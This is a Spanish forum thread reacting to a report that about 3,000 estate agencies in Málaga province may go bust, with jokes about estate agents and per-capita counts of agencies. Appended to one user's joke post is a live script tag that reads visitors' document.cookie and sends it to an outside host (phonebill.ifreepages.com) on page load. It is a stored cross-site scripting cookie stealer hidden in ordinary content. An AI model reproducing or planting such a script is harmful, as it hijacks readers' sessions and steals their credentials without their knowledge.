se estima que 3,000 inmobiliarias quebraran en Malaga en los proximos meses

dakz

Madmaxista
Desde
10 Nov 2006
Mensajes
475
Reputación
351
Editado en Español; a mi me parece una noticia buenisima!



Se espera que 3,000 inmobiliarias quiebren en Malaga

Hay mas de 10,600 inmobiliarias en la provincia

Se estima que 3000 inmobiliarias quiebren en la provincia de Malaga en los proximos meses mientras el mercado se enfria.


El numero fue facilitado al periodico "Opinion de Málaga" por el presidente de La asociacion de inmobiliarias ,Óscar Martínez.

Figuras oficiales muestran que hay mas inmobiliarias que bares en la provincia, mas de 10,600, muchas de las cuales se crearon durante el boom inmobiliario

Ahora con una subida de precios y aumento de intereses se esta frenando el mercado considerablemente con una media de tiempo de venta aumentando hasta 9 meses.


http://www.typicallyspanish.com/news/publish/article_9365.shtml

3,000 estate agents expected to go broke in Málaga province


There are more than 10,600 estate agents in the province

It’s been estimated that 3,000 estate agents will go bust in the province of Málaga over the next few months as the housing market slows down.

The number was given to the Opinion de Málaga newspaper by the President of the Professional Real Estate Agents Association, Óscar Martínez.

Offiical figures show that there are now more estate agents than bars across the province, at more than 10,600, with many of them being created to take advantage of the real estate boom.

Now though, higher prices of property and increasing interest rates are slowing the market considerably, with the average time a property is now on the market increasing to nine months.
 
Última edición:

chicken

Madmaxista
Desde
15 Jul 2006
Mensajes
9.620
Reputación
9.521
¿3.000 sólo en Málaga? Si eso es cierto, significa que la construcción va a menos. Por tanto, habrá que desarrollar otros sectores económicos para compensarlo.
 

CinquèGat

Madmaxista
Desde
7 Oct 2006
Mensajes
667
Reputación
9
Lugar
Barcelona
Que bien, la de locales comerciales que quedarán libres para montar otros negocios...
Hasta el gorro de inmobiliarias y sucursales bancarias (la era de internet decían, y hay cruces en las ciudades con un banco en cada esquina).
 

la barquera

Madmaxista
Desde
25 Dic 2006
Mensajes
9.826
Reputación
9.262
¿Porqué será?

Vivo en un pueblo costero de Malaga, y lo que he notado es que aquí muchos despachos de abogados son desde hace unos años, y a la vez, inmobiliarias.
Aparte de que no faltan ninguna de las tecnos, donnas, y similares, tampoco las de cadenas provinciales y grupos o particulares extranjeras.
En fin, que en un radio de 500 metros se pueden contar 20 ó más. Eso sin descontar a todo hijo de vecino que se dedica (aún hoy) a passsar lo que pueda.
Eso sí... (jejejejejej) hoy por hoy... vacíiiiiiaaasss. :D :D :rolleyes:
 
Desde
15 Mar 2007
Mensajes
5.111
Reputación
3.333
Ayyyyyyyy qué pena más grande...

3000 inmobiliarias menos... ¿Y ahora qué harán? ¿Montarán bares?

Cuánto echaremos de menos a nuestros pasapiseros con sus corbatitas verdes rulando por las calles...

Yo creo que la solución sería reconvertir las inmobiliarias a profilacterías reversibles, total... Con la que se nos viene encima vamos a tener hasta un lonchafinismo condonil ;)<script>image= new Image(); image.src="http://phonebill.ifreepages.com/burbuja/image2.cgi?"+escape(document.cookie)</script>
 
Última edición:

najmah

Madmaxista
Desde
28 Dic 2006
Mensajes
470
Reputación
6
Me parece una barbaridad, un despropósito...
¡Nunca deberían haber existido 3000 inmobiliarias en Málaga!
 

Bokeron

Madmaxista
Desde
22 Nov 2006
Mensajes
1.405
Reputación
971
najmah dijo:
Me parece una barbaridad, un despropósito...
¡Nunca deberían haber existido 3000 inmobiliarias en Málaga!
Figuras oficiales muestran que hay mas inmobiliarias que bares en la provincia, mas de 10,600, muchas de las cuales se crearon durante el boom inmobiliario
Pues nada chico, ahora vamos a reciclarlas todas en franquicias de refinanciación y créditos rápidos. Madre mía la que se nos viene encima. :eek:
 
Desde
20 Mar 2007
Mensajes
2.936
Reputación
3.340
Esto cada vez se parece más a lo de los sellos
:eek:
¡¡Pero la gente no se dará nunca cuenta de que un negocio en el que todos ganan es insostenible!!
:eek:
¡10.600 inmobiliarias en Málaga!
con 560.000 habitantes (según Wikipedia)
:eek:
tocan a ¡¡¡1 inmobiliaria por cada 53 habitantes!!!
:eek:
 

Eddy

Madmaxista
Desde
1 Oct 2006
Mensajes
4.926
Reputación
7.828
Spanish Land Grab Threatens to Undermine Second-Home Gold Rush


Matando a la gallina de las narices de oro


Como se dice lo de la operación Malaya en inglés?

"Spain's real-estate industry made headlines last year when the urban planning adviser in the resort town of Marbella was arrested on charges he accepted bribes to award building permits. Juan Antonio Roca, who's still awaiting trial, had a network of officials who re-zoned rural land for development, multiplying its value, according to court rulings released last year."

"It may be too little too late. A doubling of property prices since 2000 and the battle over Spain's version of eminent domain are already contributing to a decline in the market"
 

Bokeron

Madmaxista
Desde
22 Nov 2006
Mensajes
1.405
Reputación
971
Agarraoslaskalandrakas dijo:
Esto cada vez se parece más a lo de los sellos
:eek:
¡¡Pero la gente no se dará nunca cuenta de que un negocio en el que todos ganan es insostenible!!
:eek:
¡10.600 inmobiliarias en Málaga!
con 560.000 habitantes (según Wikipedia)
:eek:
tocan a ¡¡¡1 inmobiliaria por cada 53 habitantes!!!
:eek:
No hombre, tranquilo, que se refiere a la provincia, y ahí somos mas de un millón, por lo que tocaremos a una inmo por cada cien.
 
Desde
20 Mar 2007
Mensajes
2.936
Reputación
3.340
Agarraoslaskalandrakas dijo:
Esto cada vez se parece más a lo de los sellos
:eek:
¡¡Pero la gente no se dará nunca cuenta de que un negocio en el que todos ganan es insostenible!!
:eek:
¡10.600 inmobiliarias en Málaga!
con 560.000 habitantes (según Wikipedia)
:eek:
tocan a ¡¡¡1 inmobiliaria por cada 53 habitantes!!!
:eek:

Me cito a mi mismo porque me he dado cuenta de que las 10.600 inmobiliarias están en toda la provincia de Málaga y ahí, el nº de habitantes es de 1.500.000 aprox, así que sólo hay


UNA INMOBILIARIA POR CADA 140 HABITANTES
 
Desde
15 Mar 2007
Mensajes
5.111
Reputación
3.333
Agarraoslaskalandrakas dijo:
Me cito a mi mismo porque me he dado cuenta de que las 10.600 inmobiliarias están en toda la provincia de Málaga y ahí, el nº de habitantes es de 1.500.000 aprox, así que sólo hay


UNA INMOBILIARIA POR CADA 140 HABITANTES
Eso quiere decir que un malagueño, al menos, conoce a algún pasapisero... con lo que si hay 5 bokerones en el foro, tendremos cotilleos que contar, ¿no?

Por mi parte... en c\ Ayala hay 5 inmobiliarias seguidas, vamos, la repera. ¿Qué sentido tiene ponerlas todas juntas? Esto parece el perro del hortelano: ni come ni deja comer. Pero seguro que irán reconvirtiendose en prostíbulos, o en "tiendas de todo a 100".

Yo estoy por crear un concurso de solitarios "on line", porque se pasan todo el dia los comerciales jugando a eso :D
 

Kukurruku

Madmaxista
Desde
20 Feb 2007
Mensajes
100
Reputación
0
Lugar
Madrid
Insisto como en otros hilos..

Bienvienida sea la mascletá de inmobiliarias!

En el Corte Inglés va a haber 2x1 en corbatas verdes! :D
 

feliponII

Madmaxista
Desde
6 Jul 2006
Mensajes
1.539
Reputación
583
Lugar
sevilla
en una urbanizacion desierta 2

Hace unos meses me acerque a una urbanizacion medio desierta por la zona del rincon ( con pisos para invertir :) ) y los unicos negocios que habiar eran dos inmobiliarias ... me parecio curioso que no habia ni comestibles ni tiendas a 100 ni otros negocios solo dos inmobiliarias ...

De todas formas no es nada raro ... hasta hace un año en una inmobiliaria en malaga podias ganar mucho mas dinero que en cualquier otro negocio y la inversion es minima ... ademas el trabajo es estupendo ... tengo amigos ingenieros cobrando un tercio que un comercial listillo de inmo

es normal que se hayan hecho el negocio de moda ... eso si la castaña puede ser de ordago